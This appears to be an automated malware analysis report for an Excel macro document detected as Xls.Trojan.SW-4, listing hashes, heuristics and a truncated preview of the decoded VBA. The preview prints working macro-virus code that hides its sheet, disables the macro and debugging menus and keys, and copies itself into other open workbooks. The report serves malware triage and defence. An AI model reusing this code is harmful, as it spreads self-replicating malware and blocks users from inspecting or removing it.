Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a1e334a8c41357bd…

MALICIOUS

Office (OLE)

30.0 KB Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 58cc9f79f809a17f89491ed319871f1d SHA-1: 29e444d3f316223a9f58838afc5b1fe8031aca42 SHA-256: a1e334a8c41357bd53bc9344c7a698b18a1fedb00a594b91f12d302efe87aef1
340 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is an Excel document containing VBA macros, including Auto_Open and Auto_Close functions, which are commonly used to execute malicious code upon opening or closing the document. The macros attempt to modify Excel's menus and hide sheets, indicating an effort to conceal malicious activity or manipulate the user. The presence of embedded OLE structures and ClamAV detections further support its malicious nature.

Heuristics 7

  • ClamAV: Xls.Trojan.SW-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.SW-4
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 18,714 bytes but its declared streams total only 0 bytes — 18,714 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21666 bytes
SHA-256: 9f2366e3334a6881a5899e89c026b2fab57d23e723a14788354706fa5f4cf5a3
Detection
ClamAV: Xls.Trojan.SW-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "sw"

'F051C320071ABCE57ADB4C960D7B44E91BC285
Declare Function GetCurrentTime Lib "USER" () As Long
Attribute GetCurrentTime.VB_ProcData.VB_Invoke_Func = " \n14"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "no"
End Sub
Sub no()
Attribute no.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Application.EnableCancelKey = xlDisabled
pawn$ = ActiveWorkbook.Name
pawns$ = ActiveWorkbook.ActiveSheet.Name
If ActiveWorkbook.Sheets("sw").Visible = True Then ActiveWorkbook.Sheets("sw").Visible = False
Application.MenuBars(xlWorksheet).Menus("tools").MenuItems("macro...").Delete
Application.MenuBars(xlWorksheet).Menus("tools").MenuItems.Add Caption:="&Macro...", OnAction:="", before:="record macro"
Application.MenuBars(xlNoDocuments).Menus("file").MenuItems("macro...").Delete
Application.MenuBars(xlNoDocuments).Menus("file").MenuItems.Add Caption:="&Macro...", OnAction:="", before:="record new macro..."
Application.MenuBars(xlModule).Menus("tools").MenuItems("macro...").Delete
Application.MenuBars(xlModule).Menus("tools").MenuItems.Add Caption:="&Macro...", OnAction:="", before:="record macro"
Application.MenuBars(xlModule).Menus("tools").MenuItems("menu editor...").Delete
Application.MenuBars(xlModule).Menus("tools").MenuItems.Add Caption:="Menu E&ditor...", OnAction:="", before:="attach toolbars..."
Application.MenuBars(xlModule).Menus("run").MenuItems("start").Delete
Application.MenuBars(xlModule).Menus("run").MenuItems.Add Caption:="S&tart", before:="end", OnAction:=""
Application.MenuBars(xlModule).Menus("run").MenuItems("step into").Delete
Application.MenuBars(xlModule).Menus("run").MenuItems.Add Caption:="Step &Into", before:="step over", OnAction:=""
Application.MenuBars(xlChart).Menus("tools").MenuItems("macro...").Delete
Application.MenuBars(xlChart).Menus("tools").MenuItems.Add Caption:="&Macro...", OnAction:="", before:="record macro"
Application.MenuBars(xlWorksheet).Menus("view").MenuItems("toolbars...").Delete
Application.MenuBars(xlWorksheet).Menus("view").MenuItems.Add Caption:="&Toolbars...", OnAction:="", before:=3
Application.MenuBars(xlModule).Menus("view").MenuItems("toolbars...").Delete
Application.MenuBars(xlModule).Menus("view").MenuItems.Add Caption:="&Toolbars...", OnAction:="", before:=3
Application.MenuBars(xlModule).Menus("view").MenuItems("debug window").Delete
Application.MenuBars(xlModule).Menus("view").MenuItems.Add Caption:="&Debug Window", OnAction:=""
Application.OnKey "{F5}", ""
Application.OnKey "{F8}", ""
Application.OnKey "^g", ""
Application.MenuBars(xlChart).Menus("view").MenuItems("toolbars...").Delete
Application.MenuBars(xlChart).Menus("view").MenuItems.Add Caption:="&Toolbars...", OnAction:="", before:=3
Application.ShortcutMenus(xlToolbar).MenuItems("toolbars...").Delete
Application.ShortcutMenus(xlToolbar).MenuItems.Add Caption:="Toolbars...", OnAction:=""
Application.ShortcutMenus(xlToolbar).MenuItems("customize...").Delete
Application.ShortcutMenus(xlToolbar).MenuItems.Add Caption:="Customize...", OnAction:=""
tc = Toolbars.Count
For s = 1 To tc
ttc = Toolbars(s).ToolbarButtons.Count
For t = 1 To ttc
If InStr("Run MacroStep IntoStep MacroMenu Editor", Toolbars(s).ToolbarButtons(t).Name) <> 0 And Toolbars(s).ToolbarButtons(t).Name <> "" Then Toolbars(s).ToolbarButtons(t).Enabled = False
Next t
Next s
wc = Workbooks.Count
If wc < 2 Then GoTo bye
Application.ScreenUpdating = False
j = 1
Do While j <= wc
wmc = Workbooks(j).Modules.Count
m = 1
Do While wmc > 0 And m <= wmc
If Workbooks(j).Modules(m).Name = "sw" Then Exit Do
m = m + 1
Loop
If m <= wmc Then Exit Do
j = j + 1
Loop
For i = 1 To wc
wmc = Workbooks(i).Sheets.Count
For n = 1 To wmc
If Workbooks(i).Sheets(n).Name = "sw" Then GoTo nexti
Next n
GoTo nfct
nexti:
Next i
GoTo bye
nfct:
wn$ = Workbooks(i).Name
Workbooks(j).Sheets("sw").Visible = True
Workbooks(j).Sheets("sw").Copy before:=Workbooks(i).Sheets(1)
Workbooks(j).Sheets("sw").Visible = False
Workbooks(i).Sheet
... (truncated)
embedded_office_off00002ee6.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x2EE6 18714 bytes
SHA-256: d45da21841b829e54048f25c8acce5c48530a0312e96572afda77ebde54750a4

Open this report in the interactive analyzer, or submit your own file for analysis.